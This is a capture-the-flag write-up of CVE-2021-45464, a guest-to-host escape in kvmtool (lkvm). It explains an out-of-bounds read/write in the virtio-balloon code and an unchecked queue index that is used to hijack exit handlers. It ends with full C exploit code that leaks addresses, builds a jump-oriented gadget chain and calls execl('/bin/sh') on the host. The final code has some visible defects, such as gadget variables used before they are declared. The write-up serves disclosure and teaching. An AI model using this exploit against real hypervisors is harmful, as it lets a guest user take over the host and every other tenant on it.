Headline
CVE-2021-45464: LKVM Escape
kvmtool through 39181fc allows an out-of-bounds write, related to virtio/balloon.c and virtio/pci.c. This allows a guest OS user to execute arbitrary code on the host machine.
Overview
- Attack Surface
- Information Leak
- Getting Control of Program Flow
- Putting it all together
Writeup by: Zanderdk | linkedin
Solved by: ZZZ | linkedin, N00byedge | linkedin
Indie VMM - HXP 2021
In this challenge we are given a root access to a linux machine running in the linux tools hypervisor and the goal is to escape out of the hypervisor to access the flag file on the host system. During this challenge we discovered multiple bugs leading to a zero-day exploit for lkvm which allows an attacker with access to the guest virtual machine to execute arbitrary commands on host machine. :-)
Throughout this writeup i will be referring to git checkout 39181fc6429f4e9e71473284940e35857b42772a of kvmtool when mentioning line numbers.
Attack Surface
As we are running inside a hypervisor and have clear separation between host and guest memory, we need a way of interacting with host process. There is one way of communicating with the host namely pci. Lkvm emulates 3 hardware devices though pci: virtio-console, virtio-net, virtio-balloon. We can interact with these devices using memory mapped io aka. reading and writing to specific physical memory addresses. Fx. if we write to addresses in the following range 0xd2000000-0xd20000ff (balloon-virtio) the guest is interrupted and control flow is passed to the linux kernel kvm driver and further to lkvm process.
Information Leak
One of the first functions we hit when reading from this address is virtio_pci__data_in in virtio/pci.c line 148:
static bool virtio_pci__data_in(struct kvm_cpu *vcpu, struct virtio_device *vdev,
unsigned long offset, void *data, int size)
{
bool ret = true;
struct virtio_pci *vpci;
struct virt_queue *vq;
struct kvm *kvm;
u32 val;
kvm = vcpu->kvm;
vpci = vdev->virtio;
switch (offset) {
case VIRTIO_PCI_HOST_FEATURES:
val = vdev->ops->get_host_features(kvm, vpci->dev);
ioport__write32(data, val);
break;
case VIRTIO_PCI_QUEUE_PFN:
vq = vdev->ops->get_vq(kvm, vpci->dev, vpci->queue_selector);
ioport__write32(data, vq->pfn);
break;
case VIRTIO_PCI_QUEUE_NUM:
val = vdev->ops->get_size_vq(kvm, vpci->dev, vpci->queue_selector);
ioport__write16(data, val);
break;
case VIRTIO_PCI_STATUS:
ioport__write8(data, vpci->status);
break;
case VIRTIO_PCI_ISR:
ioport__write8(data, vpci->isr);
kvm__irq_line(kvm, vpci->legacy_irq_line, VIRTIO_IRQ_LOW);
vpci->isr = VIRTIO_IRQ_LOW;
break;
default:
ret = virtio_pci__specific_data_in(kvm, vdev, data, size, offset);
break;
};
return ret;
}
this function switches on the offset into the bar (address range), meaning that if we fx read at address 0xd2000000 + VIRTIO_PCI_QUEUE_NUM == 0xd2000008 we will hit the second switch case. Here the default case is very interesting. The default case calls virtio_pci__specific_data_in on line 118:
static bool virtio_pci__specific_data_in(struct kvm *kvm, struct virtio_device *vdev,
void *data, int size, unsigned long offset)
{
u32 config_offset;
struct virtio_pci *vpci = vdev->virtio;
int type = virtio__get_dev_specific_field(offset - 20,
virtio_pci__msix_enabled(vpci),
&config_offset);
if (type == VIRTIO_PCI_O_MSIX) {
switch (offset) {
case VIRTIO_MSI_CONFIG_VECTOR:
ioport__write16(data, vpci->config_vector);
break;
case VIRTIO_MSI_QUEUE_VECTOR:
ioport__write16(data, vpci->vq_vector[vpci->queue_selector]);
break;
};
return true;
} else if (type == VIRTIO_PCI_O_CONFIG) {
u8 cfg;
cfg = vdev->ops->get_config(kvm, vpci->dev)[config_offset];
ioport__write8(data, cfg);
return true;
}
return false;
}
Here we will always end up in the else if case as this is not MSIX. config_offset is calculated base on offset passed from virtio_pci__data_in and we see that it is accessing completely without any bound checks. The value of config_offset is calculated as a return parameter in the call to virtio__get_dev_specific_field. In case we are not do a MSIX operation config_offset is just set to the value of the first parameter passed to virtio__get_dev_specific_field which is offset - 20.
So far we have only been looking at virtio and pci generic function but here the ops->get_config is called which fetched the u8 * config from the balloon driver in this case. This function is just a simple getter and looks like this:
static u8 *get_config(struct kvm *kvm, void *dev)
{
struct bln_dev *bdev = dev;
return ((u8 *)(&bdev->config));
}
As we can see the below virtio_balloon_config is the last element of the struct and as the observant reader might have noticed the config struct is very small. As the bar is 0x100 big (0xd2000000-0xd20000ff) and as long as we set offset higher than 20 we will access into the config struct and beyond as 0x100 > 20 + sizeof(virtio_balloon_config). A similar write to config function exists when writing in this bar, meaning that we have a read/write out of bound primitive here.
struct bln_dev {
struct list_head list;
struct virtio_device vdev;
u32 features;
/* virtio queue */
struct virt_queue vqs[NUM_VIRT_QUEUES];
struct thread_pool__job jobs[NUM_VIRT_QUEUES];
struct virtio_balloon_stat stats[VIRTIO_BALLOON_S_NR];
struct virtio_balloon_stat *cur_stat;
u32 cur_stat_head;
u16 stat_count;
int stat_waitfd;
struct virtio_balloon_config config;
};
struct virtio_balloon_config {
/* Number of pages host wants Guest to give up. */
__le32 num_pages;
/* Number of pages we've actually got in balloon. */
__le32 actual;
/*
* Free page hint command id, readonly by guest.
* Was previously named free_page_report_cmd_id so we
* need to carry that name for legacy support.
*/
union {
__le32 free_page_hint_cmd_id;
__le32 free_page_report_cmd_id; /* deprecated */
};
/* Stores PAGE_POISON if page poisoning is in use */
__le32 poison_val;
};
This memory is not stored on the stack but rather in a kinda uninteresting mmaped area. This means that we were not able to get control of the program flow from smashing this memory area. However we were able to leak information from this bug namely two pointers of interest were leaked, a address to the bln_dev structure itself and a address revelling the base address of the lkvm binary.
To execute this leaking from a userspace process we use /dev/mem to access the physical memory of the guest and in code it looks something like this:
char *mmio_mem;
u8 ioread8(u64 off) { return *(volatile uint8_t *)(mmio_mem + off); }
u16 ioread16(u64 off) { return *(volatile uint16_t *)(mmio_mem + off); }
u32 ioread32(u64 off) { return *(volatile uint32_t *)(mmio_mem + off); }
void iowrite8(u64 off, u8 val) { *(volatile uint8_t *)(mmio_mem + off) = val; }
void iowrite16(u64 off, u16 val) { *(volatile uint16_t *)(mmio_mem + off) = val; }
void iowrite32(u64 off, u32 val) { *(volatile uint32_t *)(mmio_mem + off) = val; }
u64 leak_u64(u64 off) {
u64 leak;
for (int i = 0; i < 8; i++) {
u8 val = ioread8(20 + i + off);
*(((char *)&leak)+i) = val;
}
return leak;
}
int main(void)
{
int fuck = open("/dev/mem", O_RDWR);
mmio_mem = mmap((void *)0x1337000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fuck, 0xd2000000);
u64 lkvm_leak = leak_u64(0x44);
printf("lkvm leak: %p\n", (void *)lkvm_leak);
}
Here the leak_u64 uses ioread8 to read from the mmap /dev/mem area at 0xd2000000 where the virtio-balloon is located. We offset the 20 bytes plus a out of bound offset to where we find the address pointing into the lkvm executable and boom we have our information leak. and the same procedure can be repeated for the bln_dev leak.
Getting Control of Program Flow
Now to the fun part, lets get that rip control. Lets for a second assume that we could use the previous bug to write arbitrary out of bound what intreating data could we corrupt? In the picture bellow i have set a breakpoint in the virtio_pci__specific_data_in function to inspect the bln_dev memory. Here i have dumped the memory following the config struct. We see some structures called exit_lists which unfortunately is of reach due to the 0x100 limitation. But what is it?
When the lkvm binary closes it executes a tear down process involving calling some exit handlers and this it what we find here. If we look inside the init.c at line 51 we find this lovely peace of code:
int init_list__exit(struct kvm *kvm)
{
int i;
int r = 0;
struct init_item *t;
for (i = ARRAY_SIZE(exit_lists) - 1; i >= 0; i--)
hlist_for_each_entry(t, &exit_lists[i], n) {
r = t->init(kvm);
if (r < 0) {
pr_warning("%s failed.\n", t->fn_name);
goto fail;
}
}
fail:
return r;
}
Here we se that upon exiting lkvm loop over an array struct init_item’s and call the function t->init on each element starting from the last element in the array. This is the exit_lists from before. each entry in the list is a pointer to a init_item (this struct is also used doing initialization therefore the name). If we can control one of these pointers we can potentially construct a fake init_item and change the program flow when terminating the guest os.
struct hlist_node {
struct hlist_node *next, **pprev;
};
struct init_item {
struct hlist_node n;
const char *fn_name;
int (*init)(struct kvm *);
};
Looking at the struct definition for a init_item above we see that it’s pretty simple containing 2 linked list pointers, a name pointer and the actual function pointer we want control of at offset 0x18 from top of the struct init_item.
Now if you remember we also had other functionality in the virtio_pci__data_in function than just the read and write from config. Let’s have a look at the data_out equivalent of this function in virtio/pci.c line 287:
static bool virtio_pci__data_out(struct kvm_cpu *vcpu, struct virtio_device *vdev,
unsigned long offset, void *data, int size)
{
bool ret = true;
struct virtio_pci *vpci;
struct kvm *kvm;
u32 val;
kvm = vcpu->kvm;
vpci = vdev->virtio;
switch (offset) {
case VIRTIO_PCI_GUEST_FEATURES:
val = ioport__read32(data);
virtio_set_guest_features(kvm, vdev, vpci->dev, val);
break;
case VIRTIO_PCI_QUEUE_PFN:
val = ioport__read32(data);
if (val) {
virtio_pci__init_ioeventfd(kvm, vdev,
vpci->queue_selector);
vdev->ops->init_vq(kvm, vpci->dev, vpci->queue_selector,
1 << VIRTIO_PCI_QUEUE_ADDR_SHIFT,
VIRTIO_PCI_VRING_ALIGN, val);
} else {
virtio_pci_exit_vq(kvm, vdev, vpci->queue_selector);
}
break;
case VIRTIO_PCI_QUEUE_SEL:
vpci->queue_selector = ioport__read16(data);
break;
case VIRTIO_PCI_QUEUE_NOTIFY:
val = ioport__read16(data);
vdev->ops->notify_vq(kvm, vpci->dev, val);
break;
case VIRTIO_PCI_STATUS:
vpci->status = ioport__read8(data);
if (!vpci->status) /* Sample endianness on reset */
vdev->endian = kvm_cpu__get_endianness(vcpu);
virtio_notify_status(kvm, vdev, vpci->dev, vpci->status);
break;
default:
ret = virtio_pci__specific_data_out(kvm, vdev, data, size, offset);
break;
};
return ret;
}
Here the second case for VIRTIO_PCI_QUEUE_PFN is rather interesting as this calls the virtio-balloon specific init virtual queue function. We can find this function in virtio/balloon.c at line 200. Below i have shown all of the relevant functions in one listing:
//balloon.c line 200
static int init_vq(struct kvm *kvm, void *dev, u32 vq, u32 page_size, u32 align,
u32 pfn)
{
struct bln_dev *bdev = dev;
struct virt_queue *queue;
void *p;
compat__remove_message(compat_id);
queue = &bdev->vqs[vq];
queue->pfn = pfn;
p = virtio_get_vq(kvm, queue->pfn, page_size);
thread_pool__init_job(&bdev->jobs[vq], kvm, virtio_bln_do_io, queue);
vring_init(&queue->vring, VIRTIO_BLN_QUEUE_SIZE, p, align);
virtio_init_device_vq(&bdev->vdev, queue);
return 0;
}
//virtio.h line 214
static inline void *virtio_get_vq(struct kvm *kvm, u32 pfn, u32 page_size)
{
return guest_flat_to_host(kvm, (u64)pfn * page_size);
}
//virtio_ring.h line 191
static __inline__ void vring_init(struct vring *vr, unsigned int num, void *p,
unsigned long align)
{
vr->num = num;
vr->desc = p;
vr->avail = (struct vring_avail *)((char *)p + num * sizeof(struct vring_desc));
vr->used = (void *)(((uintptr_t)&vr->avail->ring[num] + sizeof(__virtio16)
+ align-1) & ~(align - 1));
}
As we can see when vring_init is called it sets vr->desc = p which is a void * to a guest physical page that we fully control the content of. We can see this as vring_init is called from init_vq with p as argument and p is obtained from virtio_get_vq where it finds the host virtual address for a given page frame number (pfn). In init_vq we see that the parameter vq is used to calculate the offset into the bdev->vqs array. This queue = &bdev->vqs[vq]; statement is again completely without any bound checks although there is only 3 queues at any given time. This means that if we control the vq parameter we can effectively insert a pointer to guest memory out of bound.
In the listing for virtio_pci__data_out the call to init_vq is passed vpci->queue_selector as the argument for vq and in the same listing we also find that we control vpci->queue_selector entirely using the VIRTIO_PCI_QUEUE_SEL case in the switch statement.
Looking at the struct definition of the vring *vr below we see the it has 4 members and a size of 0x20 meaning we can’t insert this pointer at arbitrary locations. but only at offsset 0x20*x + 8 where we fully control x.
//virtio_ring.h line 143
typedef struct vring_desc __attribute__((aligned(VRING_DESC_ALIGN_SIZE)))
vring_desc_t;
typedef struct vring_avail __attribute__((aligned(VRING_AVAIL_ALIGN_SIZE)))
vring_avail_t;
typedef struct vring_used __attribute__((aligned(VRING_USED_ALIGN_SIZE)))
vring_used_t;
struct vring {
unsigned int num;
vring_desc_t *desc;
vring_avail_t *avail;
vring_used_t *used;
};
If you recall from before we had the exit_lists not far from the locations of this bdev struct and now we have a unbound insert pointer premitive and it just so happens that if we set vq to 0x16 we end up inserting this pointer in the last entry of this exit_lists. In code this looks like so:
#define VIRTIO_PCI_QUEUE_PFN 8
#define VIRTIO_PCI_QUEUE_SEL 14
char *mmio_mem;
u8 ioread8(u64 off) { return *(volatile uint8_t *)(mmio_mem + off); }
u16 ioread16(u64 off) { return *(volatile uint16_t *)(mmio_mem + off); }
u32 ioread32(u64 off) { return *(volatile uint32_t *)(mmio_mem + off); }
void iowrite8(u64 off, u8 val) { *(volatile uint8_t *)(mmio_mem + off) = val; }
void iowrite16(u64 off, u16 val) { *(volatile uint16_t *)(mmio_mem + off) = val; }
void iowrite32(u64 off, u32 val) { *(volatile uint32_t *)(mmio_mem + off) = val; }
void vp_legacy_set_queue_address(u16 index, u32 queue_pfn)
{
iowrite16(VIRTIO_PCI_QUEUE_SEL, index);
iowrite32(VIRTIO_PCI_QUEUE_PFN, queue_pfn);
}
int main(void)
{
int fuck = open("/dev/mem", O_RDWR);
mmio_mem = mmap((void *)0x1337000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fuck, 0xd2000000);
int fuck2 = open("/dev/mem", O_RDWR);
void *yolo = mmap((void *)0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fuck2, 1 << 12);
memset(yolo, 'A', 0x200);
vp_legacy_set_queue_address(0x16, 0x1);
system("echo c > /proc/sysrq-trigger");
}
Here we set the page frame number to 0x1 meaning guest physical address 0x1000, and again use /dev/mem to map the physical address 0x1000 to a address in the userspace process we can manipulate. Apparently rebooting or exiting the guest OS in any sane way did not cause these exit handlers to be called, but luckily crashing the kernel on a undefined instruction does :D So that is the reason for the ugly as fuck echo c > /proc/sysrq-trigger.
Memory dump before exiting:
Here we see all the 'A’s inserted from the memset above apearing at the address inside exit_lists+72. and it’s is obvious that we now control the program flow as t->init(kvm) calls this address that we fully control. Sweet now we got that rip control and we can redirect program flow.
Now we need a target to redirect our code to in order to execute code or commands on the host system, lucaly this binary basicaly has a ret to own function virtio_net_exec_script:
Now if we can control the $rdi regsiter and jump to the instruction marked by the red arrow in virtio_net_exec_script we effectively call execl(command_we_control, …) and execute a command on the host system.
Putting it all together
Now we have all the necessary parts to construct a fake init_item launching a ROP chain that calls exevl or more like a JOP chain as we will from here heavily rely on Jump oriented programming. To summarize we now have a leak using the first bug as well as the ability to control some of the bytes in that area as we can also write in the area we leak from. And we have a way of getting rip control but unfotunatly we don’t control any of the arguments to this functions call kvm in t->init(kvm) is not whitin the same mmap slide.
When we fist do the initial call to t->init $rbx points to our fake init_item aka memory we control.
First we jump to this gadget: mov rax, qword ptr [rbx + 0x28]; mov rdi, rbx; mov rsi, qword ptr [rax + 8]; call qword ptr [rax];
This moves $rbx into $rdi allowing us to control the first argument of any fuction call and again fetching a new location to jump to from [$rbx + 0x28].
and now we can just jump to the super awsome gadget from before as we now have $rdi control.
Now this calls execl("/bin/sh", "", null); and we get a shell back :D We have registered the CVE-2021-45464 which is currently reserved and waiting for approval. Here is the full exploit code but be aware it will not work out of the box for any version of lkvm the gadget offsets has to be changed for the specific binary:
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/klog.h>
#include <unistd.h>
#include <time.h>
#include <sys/shm.h>
#include <sys/timerfd.h>
#include <poll.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <time.h>
#include <errno.h>
#include <sys/msg.h>
#include <dirent.h>
#include <sys/sendfile.h>
#include <sys/resource.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/syscall.h> /* Definition of SYS_* constants */
#include <unistd.h>
#include <sys/reboot.h> /* Definition of RB_* constants */
#define u64 uint64_t
#define u32 uint32_t
#define u16 uint16_t
#define u8 uint8_t
void shell(void)
{
setuid(0);
setgid(0);
setreuid(-1, 0);
setregid(-1, 0);
char *arg[] = {"/bin/sh", NULL};
execve("/bin/sh", arg, NULL);
}
/* A 32-bit r/o bitmask of the features supported by the host */
#define VIRTIO_PCI_HOST_FEATURES 0
/* A 32-bit r/w bitmask of features activated by the guest */
#define VIRTIO_PCI_GUEST_FEATURES 4
/* A 32-bit r/w PFN for the currently selected queue */
#define VIRTIO_PCI_QUEUE_PFN 8
/* A 16-bit r/o queue size for the currently selected queue */
#define VIRTIO_PCI_QUEUE_NUM 12
/* A 16-bit r/w queue selector */
#define VIRTIO_PCI_QUEUE_SEL 14
/* A 16-bit r/w queue notifier */
#define VIRTIO_PCI_QUEUE_NOTIFY 16
/* An 8-bit device status register. */
#define VIRTIO_PCI_STATUS 18
/* An 8-bit r/o interrupt status register. Reading the value will return the
* current contents of the ISR and will also clear it. This is effectively
* a read-and-acknowledge. */
#define VIRTIO_PCI_ISR 19
char *mmio_mem;
size_t mmio_result;
#define MMIO_WRITE(addr, value) (*((volatile u64 *)(mmio_mem + (addr))) = (value));
#define MMIO_READ(addr) (mmio_result = *((volatile u64 *)(mmio_mem + (addr))));
u8 ioread8(u64 off) { return *(volatile uint8_t *)(mmio_mem + off); }
u16 ioread16(u64 off) { return *(volatile uint16_t *)(mmio_mem + off); }
u32 ioread32(u64 off) { return *(volatile uint32_t *)(mmio_mem + off); }
void iowrite8(u64 off, u8 val) { *(volatile uint8_t *)(mmio_mem + off) = val; }
void iowrite16(u64 off, u16 val) { *(volatile uint16_t *)(mmio_mem + off) = val; }
void iowrite32(u64 off, u32 val) { *(volatile uint32_t *)(mmio_mem + off) = val; }
u64 leak_u64(u64 off) {
u64 leak;
for (int i = 0; i < 8; i++) {
u8 val = ioread8(20 + i + off);
*(((char *)&leak)+i) = val;
}
return leak;
}
void vp_legacy_set_queue_address(u16 index, u32 queue_pfn)
{
iowrite16(VIRTIO_PCI_QUEUE_SEL, index);
iowrite32(VIRTIO_PCI_QUEUE_PFN, queue_pfn);
}
int main(void)
{
u8 buf[0x1000];
u64 pic_addr;
// shell();
int fd = open("/sys/devices/pci0000:00/0000:00:00.0/resource", O_RDONLY);
if (fd == -1)
{
perror("open");
exit(EXIT_FAILURE);
}
memset(buf, 0, sizeof(buf));
read(fd, buf, sizeof(buf));
close(fd);
sscanf(buf, "%p", &pic_addr);
printf("PIC address: %p\n", pic_addr);
int mmio_fd = open("/sys/devices/pci0000:00/0000:00:00.0/resource1", O_RDWR | O_SYNC);
if (mmio_fd == -1)
{
perror("open");
exit(EXIT_FAILURE);
}
mmio_mem = mmap((void *)0xabc0000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0x0);
if (mmio_mem == MAP_FAILED)
{
perror("mmap");
exit(EXIT_FAILURE);
}
printf("mmio_mem: %p\n", mmio_mem);
int fuck = open("/dev/mem", O_RDWR);
mmio_mem = mmap((void *)0x1337000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fuck, 0xd2000000);
printf("%p\n", mmio_mem);
u64 lkvm_leak = leak_u64(0x44);
printf("lkvm_leak %p\n", (void *)lkvm_leak);
u64 dumb_heap = leak_u64(0x34);
printf("dumb heap %p\n", (void *)dumb_heap);
u64 guest_leak = leak_u64(0xd0);
printf("guest_leak %p\n", (void *)guest_leak);
u64 r8 = dumb_heap - 0x210 + 0x20;
printf("r8 %p\n", (void *)r8);
u64 base = lkvm_leak - 0x192f0;
printf("dumb base %p\n", (void *)base);
u64 guest_space = 0x2a7d7ae5ec40 + r8;
printf("shit!!!!: %p\n", (void *) guest_space);
u64 exec_gadget = base + 0x0157C0;
vp_legacy_set_queue_address(0x16, 0x1);
char buf2[0xb0];
memset(buf2, 0x51, sizeof(buf2));
u64 *jop2 = (u64 *)buf2;
jop2[0x8/8] = execl_gadget;
for (int i = 0; i < sizeof(buf2); i++)
iowrite8(24 + i, buf2[i]);
int fuck2 = open("/dev/mem", O_RDWR);
void *yolo = mmap((void *)0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fuck2, 1 << 12);
memset(yolo, 'A', 0x200);
strcpy(yolo, "/bin/sh");
u64 *jop1 = (u64 *)yolo;
jop1[0x18/8] = jop_gadget_1;
u64 jop_gadget_1 = base + 0x000000000000ce9c;
u64 execl_gadget = base + 0x15847;
system("echo c > /proc/sysrq-trigger");
}